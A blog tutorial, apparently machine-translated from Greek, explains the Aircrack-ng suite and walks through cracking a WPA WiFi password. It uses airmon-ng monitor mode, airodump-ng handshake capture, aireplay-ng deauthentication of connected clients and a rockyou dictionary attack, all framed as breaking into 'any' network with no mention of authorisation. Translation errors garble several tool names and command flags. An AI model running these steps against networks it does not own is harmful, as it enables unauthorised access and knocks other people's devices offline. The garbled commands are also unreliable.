Saturday, February 20, 00:42
Home how To Aircrack-ng: How to connect to any WiFi network?

Aircrack-ng: How to connect to any WiFi network?

Continuing to look back at the famous tools belonging to their category password crackers, we meet Aircrack-ng. Aircrack-ng is not just a password finder but one of the best tools for wifi hacking. To be more precise, this is a suite of tools that help manipulate and infiltrate wireless networks:

  • Airmon-ng: Used to manage all different modes of wireless cards and to eliminate processes when using aircrack-ng. To be able to track a wireless traffic, you need to change the wireless card mode from managed to a monitor.
  • Airodump-ng: Can capture wireless information from one or more wireless Access Points. It is essentially used for the analysis of contigs Access Points (eg WiFi routers) and recording handshakes. The handshake is a preparatory step for data transfer.
  • Aireplay-ng: Used for replay attacks and as a packet injector. It can also disconnect users connected to Access Points.
  • Airdecap-ng: Aircap-ng Used to decrypt WEP, WPA / WPA2 wireless packets in cases where the encryption key is known.
  • Aircrack-ng: It is used to attack WPA / WEP wireless protocols to retrieve the encryption key.


The letters ng are derived from the words "new generation" as Aircrack-ng replaced the older aircrack suite that is no longer supported. The tool is offered for Windows and Linux platforms.

How to install it


There are two driver solutions available for Windows operating systems and only Airpcap currently supports Aircrack-ng 0.9.X:

  • The Airpcap is a device that supports monitor mode and injection.
  • That's itNPcap is one packet sniffing library for Windows based on WinPcap / Libpcap libraries.

The Github repos and downloads above are available here.

You can find the latest version of Aircrack-ng from official site of. Download the zip compressed folder there.


You should then unzip the folder to the "C: \" location. This will create a new folder named "aircrcrack-ng - *. *. * - win" - depending on the version of the tool you download. The folder should contain 3 subfolders named "bin", "src" and "test". Look for the file "Aircrack-ng GUI.exe" in the "bin" subfolder and run it.


Aircrack is preinstalled in the well known operating system version for penetration testers, Kali Linux.

Install the tool by running, in a terminal, the following:

$ sudo apt-get update
$ sudo apt-get install -y aircrack-ng


How to use it

Below, we will see how we can use aircrack-ng to break into an encrypted wireless network and find his password. The red letters refer to the information that each user should modify according to the names on their network.

WiFi Aircrack-ng

First of all, we can see all available wireless cards which are connected to our computer using the iwconfig command.

Now, we have to choose which of the available wireless cards to use for the attack. Using the tool airmon-ng we will terminate all process actions and then change the card mode to monitor. Monitor mode will allow us to capture all packets on the network, even those not intended for our computer:

$ sudo airmon-ng check kill
$ sudo airmon-ng start wireless_card_name


After our card entered monitor mode, it will now appear with a different name "wlan0mon". You can check it by running the command we saw earlier, iwconfig.

Now we have to use the tool airodumb-ng  to see all the nearby wireless access points and their available information:

$ sudo airodump-ng wlan0mon


You can customize your search by hardware address or otherwise mac address (-bssid) of the access point, or based on the WiFi channel (-c).

To capture a "handshake" containing the encrypted password we need to save the packages we capture using the parameter -write. Example:

$ sudo airodump-ng –bssid 6C: B7: 49: FC: 62: E4 -c 11 wlan0mon –write /tmp/handshake.cap


We will now disconnect all devices connected to that access point using its function aireplay-ng:

$ sudo aireplay-ng -0 100 -a 6C: B7: 49: FC: 62: E4 wlan0mon


After a while the devices will be disconnected and when they try to reconnect to the access point, we will capture the handshake using the airodump-ng. What you see on your screen should look like the following image:


The handshake data, including the encrypted password, is stored in the directory /tmp/. Now, we can find the password using Aircrack-ng and dictionary attack:

$ sudo aircrack-ng /tmp/handshake.cap-01.cap -w /usr/share/wordlists/rockyou.txt


That's it aircrack-ng will display the password after finding it in the terminal.

In the example we see, aircrack-ng found that the password is '123456789'.

After completing the attack, we can stop the monitor mode of the card and restart it. network manager:

$ sudo airmon-ng stop wlan0mon
Restart $ sudo service network-manager


How did the Aircrack-ng tool suite look to you? Waiting for your comment ...



Please enter your comment!
Please enter your name here

Here's the crazy ones, the misfits, the rebels, the troublemakers ...


How to quickly create QR codes with Bing

If you ever need to create a QR code, but you do not know how, Microsoft has an easy-to-use tool available in any program ...

Brave: Onion addresses leaked to DNS traffic

The Tor function included in the Brave web browser, allows users to access .onion dark web domains within ...

What are the 6 most known attacks on gaming companies?

A few days ago, the gaming company Big Huge Games informed the players that it was the victim of an attack, which affected its data ...

Xbox gift cards are sold at a 10% discount on Amazon

Xbox owners can save some money on games, add-ons, subscriptions and more if they buy Xbox gift cards at ...

Perseverance: NASA spacecraft lands on Mars!

The spacecraft "Perseverance" successfully landed yesterday, shortly before 11 pm Greek time on Mars. Aim of this mission of ...

YouTube: You can play 4K videos on devices with low resolution screens

Youtube application on Android allows you to play videos up to 4K resolution. All you need is a phone with ...

Top positions Software Engineering and coding skills for 2021

Due to COVID-19, recruitment efforts and employment opportunities fell sharply last year. However, the technology industry has proven to be more resilient ...

Phishing emails: How to recognize them and how to protect yourself? Το phishing είναι ίσως η μεγαλύτερη απειλή στον κυβερνοχώρο εδώ και περισσότερα από πέντε χρόνια. Γι΄...

US and UK condemn Facebook for blocking Australia

Politicians, news agents and civil rights groups in the UK and US have targeted Facebook for its decision to ...

Vaio Z (2021) Released - What are its specifications?

The Vaio Z (2021) was released as the last laptop of Vaio Corporation based in Japan. The laptop comes with a border ...